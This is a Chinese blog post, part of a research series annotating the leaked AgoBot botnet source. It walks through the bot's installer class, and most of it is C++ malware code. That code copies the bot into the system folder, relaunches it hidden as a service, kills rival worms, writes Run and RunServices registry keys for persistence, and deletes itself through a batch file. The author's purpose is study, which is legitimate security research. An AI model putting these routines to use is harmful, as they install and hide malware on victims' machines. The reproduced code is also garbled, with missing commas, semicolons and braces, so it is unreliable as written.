AgoBot 僵尸网络研究笔记(十二)

最新推荐文章于 2021-03-25 11:08:23 发布
最新推荐文章于 2021-03-25 11:08:23 发布
阅读量863 收藏
点赞数
分类专栏: 源码赏析 文章标签: 网络 null path dll access linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/anzijin/article/details/2312830
版权
 

十二、2008年3月19日

 

作者:青青子衿

email:anzijin@sina.com

1 bool   CInstaller :: CopyToSysDir ( CString  & sFilename )   函数

//

//函数功能:保证系统中只有一个bot在运行,将bot拷贝到系统文件夹中, 把拷贝到系统中的bot运行起来

//参数:   CString &sFilename  bot的文件名

//返回值:   调用成功返回true,否则返回false

//

/

bool   CInstaller :: CopyToSysDir ( CString  & sFilename )

{

  char   tstr [ MAX_PATH ];

 

#ifdef  WIN32

  CString   sysdir

  GetSystemDirectory ( sysdir . GetBuffer ( MAX_PATH ),  MAX_PATH );   //获得系统文件目录

 

  m_sSysDir . Assign ( sysdir . CStr ());  //将该目录添加到该类的唯一的一个成员变量中

 

  CString   cfilename

  GetModuleFileName ( GetModuleHandle ( NULL ),  cfilename . GetBuffer ( MAX_PATH ),  MAX_PATH );   //获得当前模块的所在文件的文件名

  HINSTANCE   kernel32_dll = LoadLibrary ( "kernel32.dll" );  //加载kernel32.dll文件

  if ( kernel32_dll ) //获得一下函数的位置

  {

    fRegisterServiceProcess =( RSP ) GetProcAddress ( kernel32_dll "RegisterServiceProcess" );

    fCreateToolhelp32Snapshot =( CT32S ) GetProcAddress ( kernel32_dll "CreateToolhelp32Snapshot" );

    fProcess32First =( P32F ) GetProcAddress ( kernel32_dll "Process32First" );

    fProcess32Next =( P32N ) GetProcAddress ( kernel32_dll "Process32Next" );

    if ( fRegisterServiceProcess

    {

      fRegisterServiceProcess (0, 1);   //把当前进程设置为服务

   

  }

 

#else

  //处理linux的情况

  m_sSysDir . Assign ( "/usr/sbin" );

  CString   sysdir ( m_sSysDir );

  CString   cfilename ( g_cMainCtrl . m_sArgv0 );

#endif  // WIN32

  if (! g_cMainCtrl . m_cCmdLine . m_cConfig . bUpdate )

  {

    unsigned   long   lStartTime = GetTickCount (); 

    bool   bFound = true ;

    while (( GetTickCount ()- lStartTime ) < 60000 &&  bFound )   //判断超时

    {  

      if ( GetCopies ( sFilename )<2)  //获得拷贝的数目

     

        //如果小于2设为返回false

        bFound = false ;

     

      Sleep (1000);

    }

    if ( bFound )   //如果拷贝数大于2 ,那么本进程结束

    {

      exit (1);

    }

  }

  long   lTimeoutStart ;  

  if (! cfilename . Find ( sFilename . CStr (), 0))   //如果参数的文件名,是进程文件名的子字符串,执行下面的操作

  {

    if ( g_cMainCtrl . m_cCmdLine . m_cConfig . bUpdate //如果bUpdate 为true,则杀掉进程sFilename

    {

      KillProcess ( sFilename . CStr ());

    }

  }           //这里保证了系统中只有一个bot进程在运行。

#ifdef  WIN32

  // Kill MSBlast  //杀死冲击波病毒

  KillProcess ( "msblast.exe" );

  KillProcess ( "penis32.exe" );

  KillProcess ( "mspatch.exe" );

  // Kill Sobig.F  

  KillProcess ( "winppr32.exe" );  //病毒的进程名

  // Kill Welchia

  KillProcess ( "dllhost.exe" );  //病毒的进程名

  KillProcess ( "tftpd.exe" );

#else   // FIXME: Add linux worm killer here

#endif  // WIN32

  if (! cfilename . Find ( sysdir , 0) ||  cfilename . Find ( "winhlpp32.exe" , 0))  //如果是在linux平台下用下面的条件语句,在windows平台下用本条件语句

#ifdef  LINUX

  if (! cfilename . Find ( sFilename , 0))

#endif   {  

    sprintf ( tstr "%s%c%s" sysdir . CStr (),  DIRCHAR sFilename . CStr ()); //DIRCHAR 表示斜杠/

    lTimeoutStart = GetTickCount ();  //获得当前的时间

  // FIXME::BAD!!!

#ifdef  WIN32

    while ( CopyFile ( cfilename tstr false )== false  &&    //拷贝文件到系统目录,

      GetTickCount ()- lTimeoutStart  < 25000)   //如果拷贝文件失败,并且尝试时间小于25秒,那么休息2秒钟后重试。

    {

      Sleep (2000);

    }

#else

    //处理linux平台,使用shell中的cp指令

    char   szCmdBuf [ MAX_PATH ]; 

    sprintf ( szCmdBuf "cp %s %s" cfilename . CStr (),  tstr );

    system ( szCmdBuf );

#endif  // WIN32

#ifndef  _DEBUG

#ifdef  WIN32

    PROCESS_INFORMATION   pinfo

    STARTUPINFO   sinfo ;

    memset (& sinfo , 0,  sizeof ( STARTUPINFO ));

    sinfo . cb  =  sizeof ( sinfo ); 

    sinfo . wShowWindow  =  SW_HIDE ;

    if ( CreateProcess ( NULL tstr NULL NULL TRUE NORMAL_PRIORITY_CLASS  |  DETACHED_PROCESS NULL NULL , & sinfo , & pinfo )) 

   

      //创建新的进程,运行拷贝到系统文件夹中的bot程序,本bot进程退出。

      exit (0); 

    }

#else 

    //在linux平台下用shell完成

    sprintf ( szCmdBuf "%s 2>&1 > /dev/null 2>&1 &" tstr );

    system ( szCmdBuf );  exit (0);

#endif  // WIN32

#endif  // _DEBUG

  }

  return   true ;

}

2 bool   CInstaller :: Install ()   函数

//

//

//函数功能:安装类的构造函数,不做任何操作

//参数:  

//返回值:   bool ,永远是true

//

///

bool   CInstaller :: Install ()

{

  return   true

}

3 bool   CInstaller :: Uninstall ()    卸载函数

///

//

//函数功能:卸载函数,启动卸载批处理卸载bot

//参数:  

//返回值:   bool调用成功返回true,否则返回false

//

///

bool   CInstaller :: Uninstall ()

{

#ifdef  WIN32

  HANDLE   f

  DWORD   r ;

  PROCESS_INFORMATION   pinfo

  STARTUPINFO   sinfo ;

  char   cmdline [ MAX_PATH ];

  char   tcmdline [ MAX_PATH ]; 

  char   cfilename [ MAX_PATH ];

  char   batfile [ MAX_PATH ]; 

  char   tempdir [ MAX_PATH ];

  GetModuleFileName ( GetModuleHandle ( NULL ),  cfilename sizeof ( cfilename ));   //获取本进程的文件名

 

  GetTempPath ( sizeof ( tempdir ),  tempdir );  //获得系统临时文件路径

  sprintf ( batfile "%s//r.bat" tempdir );  //构造删除bot批处理程序,的全路径文件名

 

  f  =  CreateFile ( batfile GENERIC_WRITE , 0,  NULL CREATE_ALWAYS , 0, 0);  //创建批处理程序

  if  ( f  > ( HANDLE )0)  //如果文件创建成功

  {

    // write a batch file to remove our executable once we close

    WriteFile ( f "@echo off/r/n"

            ":start/r/nif not exist /"/"%1/"/" goto done/r/n"

            "del /F /"/"%1/"/"/r/n"

            "del /"/"%1/"/"/r/n"

            "goto start/r/n"

            ":done/r/n"

            "del /F %temp%/r.bat/r/n"

            "del %temp%/r.bat/r/n" , 105, & r NULL );  //写入批处理代码

    CloseHandle ( f );

    memset (& sinfo , 0,  sizeof ( STARTUPINFO ));

    sinfo . cb  =  sizeof ( sinfo );

    sinfo . wShowWindow  =  SW_HIDE ;

    GetModuleFileName ( GetModuleHandle ( NULL ),  cfilename sizeof ( cfilename )); // get our file name

    sprintf ( tcmdline "%%comspec%% /c %s %s" batfile cfilename );  // build command line  构造运行批处理程序的命令行

    ExpandEnvironmentStrings ( tcmdline cmdline sizeof ( cmdline ));  // put the name of the command interpreter into the command line//扩展环境变量,作用是加上批处理程序所在的路径

    // execute the batch file

    CreateProcess ( NULL cmdline NULL NULL TRUE NORMAL_PRIORITY_CLASS  |  DETACHED_PROCESS NULL NULL , & sinfo , & pinfo );

  }

#else   // Linux

#endif  // WIN32

  return   true ;

}

4 bool   CInstaller :: RegStartAdd ( CString  & sValuename CString  & sFilename )     函数

//

//函数功能:添加启动项

//参数:   CString &sValuename     键值的名称

//       CString &sFilename     启动的文件名

//返回值:   bool 返回true

//

/

bool   CInstaller :: RegStartAdd ( CString  & sValuename CString  & sFilename )

{  

  HKEY   key ;

  RegCreateKeyEx ( HKEY_LOCAL_MACHINE "Software//Microsoft//Windows//CurrentVersion//Run" , 0,  NULL REG_OPTION_NON_VOLATILE KEY_ALL_ACCESS NULL , & key NULL ); 

  RegSetValueEx ( key sValuename , 0,  REG_SZ , ( LPBYTE )( const   char  *) sFilename , ( DWORD ) strlen ( sFilename )); 

  RegCloseKey ( key ); 

  RegCreateKeyEx ( HKEY_LOCAL_MACHINE "Software//Microsoft//Windows//CurrentVersion//RunServices" , 0,  NULL REG_OPTION_NON_VOLATILE KEY_ALL_ACCESS NULL , & key NULL ); 

  RegSetValueEx ( key sValuename , 0,  REG_SZ , ( LPBYTE )( const   char  *) sFilename , ( DWORD ) strlen ( sFilename )); 

  RegCloseKey ( key );

  return   true

}

5 bool   CInstaller :: RegStartDel ( CString  & sValuename )   函数

//

//函数功能:启动项删除

//参数:   CString &sValuename     启动项的键值名称

//返回值:   bool 永远返回true

//

///

bool   CInstaller :: RegStartDel ( CString  & sValuename )

{

  HKEY   key ;

  RegCreateKeyEx ( HKEY_LOCAL_MACHINE "Software//Microsoft//Windows//CurrentVersion//Run" , 0,  NULL REG_OPTION_NON_VOLATILE KEY_ALL_ACCESS NULL , & key NULL ); 

  RegDeleteValue ( key sValuename ); 

  RegCloseKey ( key ); 

  RegCreateKeyEx ( HKEY_LOCAL_MACHINE "Software//Microsoft//Windows//CurrentVersion//RunServices" , 0,  NULL REG_OPTION_NON_VOLATILE KEY_ALL_ACCESS NULL , & key NULL ); 

  RegDeleteValue ( key sValuename ); 

  RegCloseKey ( key ); 

  return   true

}

 
青青子衿亲
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
论文研究-基于计算机网络对抗的僵尸网络研究与进展.pdf
07-22
通过Agobot实例分析,提出将僵尸网络纳入计算机网络对抗体系之中的观点。基于计算机网络对抗理论抽象出整个僵尸网络的概念模型,对模型中功能的实现进行探讨。指出僵尸网络研究中存在的问题与进一步研究的建议。
基于覆盖率分析的僵尸网络控制命令发掘方法
01-15
僵尸网络Zeus、SdBot、AgoBot的执行轨迹进行了代码块覆盖率分析,结果表明,该方法能够快速准确地发掘出僵尸网络的控制命令集合,时间和空间开销小,且该命令集合所对应的执行轨迹可以覆盖僵尸程序95%以上的代码...
Agobot
zx980414k的博客
03-25 161
Agobot是一系列最著名的僵尸病毒(botnet僵尸网络
记一次比尔盖茨僵尸网络病毒处理过程
qq_26002283的博客
04-03 956
记一次比尔盖茨僵尸网络病毒(通过rkhunter 扫描发现)处理过程(处理过程中发现有守护进程,所以直接越过重复查找的过程): 1、 发现机器存在大量外联,紧急封堵网络。 2、 查看top 进程,发现可疑进程: 3、 通过lsof 查看进程关联的文件: 4、 查看定时任务 发现恶意定时任务: 5、 进入到定时任务文件夹查看: 6、 查看开机启动列表: 7、 查找恶意文件位置: 8、 通...
AgoBot 僵尸网络研究笔记(一)
青青子衿
02-29 2739
 AgoBot 僵尸网络研究笔记 由于工作需要,着手分析一个AgoBot的开源的程序,一些收获或许和大家分享 作者:青青子衿email:anzijin@sina.com 一、08年2月28日 1、 源代码分以下几块: Agobot3 Source     AgoBot 主体源代码, 重点分析这块的代码 Scanner Source     程序内应该包含了一
AgoBot 僵尸网络研究笔记(五)
青青子衿
03-11 1091
 五、08年03月06日 作者:青青子衿email:anzijin@sina.com 1、 random.h文件分析,该文件中函数的作用应该是完成产生随机函数相关功能,存在三个函数 (1) 、 void   init_random ();   函数,初始化随机因子 void   init_random ()  {        srand ( GetTi
AgoBot 僵尸网络研究笔记(十七)
青青子衿
05-16 992
十七、2008年04月15日作者:青青子衿email:anzijin@sina.com 1、class CRSALib 类,主要支持RSA数据加密,但护体使用方法还不清楚,需要进一步工作,暂不详细描述。2、CsdbotCompat 类class CsdbotCompat : public CCommandHandler{public:void Init();
AgoBot 僵尸网络研究笔记(十九)
青青子衿
05-23 762
十九、2008年04月17日作者:青青子衿email:anzijin@sina.com 1、void *CDownloadHelper::Run()函数中使用了 DoTcpConnect函数/////////////////////////////////////////////////////////////////////函数功能:实现TCP协议通讯的连接/
AgoBot 僵尸网络研究笔记(十六)
青青子衿
05-15 807
十六、2008年04月10日作者:青青子衿email:anzijin@sina.com 1、CPolymorph 类//推测该类的目标是实现bot对正常可执行程序的感染class CPolymorph{public:CPolymorph();CPolymorph(const char *szFile);~CPolymorph();bool M
AgoBot 僵尸网络研究笔记(七)
青青子衿
03-29 1086
 最近工作比较忙没有及时更新最近的分析结果,终于周末有点时间了,赶快补上七、2008年3月11日 作者:青青子衿email:anzijin@sina.com 1、CIRC 类中的 Init()成员函数 /////////////////////////////////////////////////////////////////////////////////////
agobot3-0[1].2.1-pre4-priv.rar_Windows编程_Visual_C++_
08-11
Agobot是一种多平台的蠕虫病毒,其源码的分析对于网络安全研究和逆向工程有着独特的价值。在Windows编程中,了解如何利用C++编写系统级程序,如网络通信、文件操作、进程控制等,是提升开发者技能的关键步骤。通过...
常见的不安全风险进程黑名单
01-02
- **描述**:与AGOBOT GH蠕虫有关。 - **危害**:此类蠕虫可以通过电子邮件传播,并可能执行其他恶意操作。 #### 33. cxtpls.exe - **描述**:与Apropos Media Spyware/Adware有关。 - **危害**:可能会显示侵扰性...
Larbin 搜索引擎源码赏析——(一)搜索引擎的main函数
青青子衿
01-07 4356
// Larbin //fileName: main.cc// Sebastien Ailleret // 09-11-99 -> 08-03-00 //comment:anzijin//2008.12.25#include  #include  #include  #include  #include  #include  #inclu
Larbin 搜索引擎源码赏析——(二)搜索引擎的全局变量类
青青子衿
01-09 4106
// Larbin // Sebastien Ailleret // 29-11-99 -> 08-03-00 #include  #include  #include  #include  #include  #include  #include  #include  #include  #include  #include "
Larbin 搜索引擎源码赏析——(四)后台控制爬虫的接口,一个极为简单的telnet服务器
青青子衿
03-23 2188
 头文件 input.h  // Larbin// Sebastien Ailleret// 03-02-00 -> 03-02-00#ifndef INPUT_H#define INPUT_H#include "global.h"/** Entry point from the outside */void *startInput (void
Larbin 搜索引擎源码赏析——(五)为二次开发用户提供的进一步处理网页的接口函数
青青子衿
04-01 2124
 output.h文件// Larbin// Sebastien Ailleret// 03-02-00 -> 16-03-00#ifndef OUTPUT_H#define OUTPUT_H#include "global.h"/* 这个文件在程序中的功能:主要是为二次开发者提供一个接口,使二次开发者可以对爬取到的网页灵活的实现相应的处理 工作,这里包
Larbin 搜索引擎源码赏析——(三)用来反馈爬虫状态微型web服务器
青青子衿
03-16 1943
  相当于一个极为简单的web服务器,大家可以关注一下,这两个文件中的核心函数void webserver ()被,主函数main函数在最后的时候调用  webserver.h 文件 // Larbin// Sebastien Ailleret// 07-03-00 -> 07-03-00#ifndef WEBSERVER_H#define WEBSER
AgoBot 僵尸网络研究笔记(二)
青青子衿
03-04 1939
 二、08年2月29日 作者:青青子衿email:anzijin@sina.com 1、 main函数 运行时的提示: [1/10] Agobot3 (0.2.1-pre3 Alpha) "Debug" on "Win32" starting up... [2/10] Debugging with debuglevel of 10... 2、 CConsDb
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值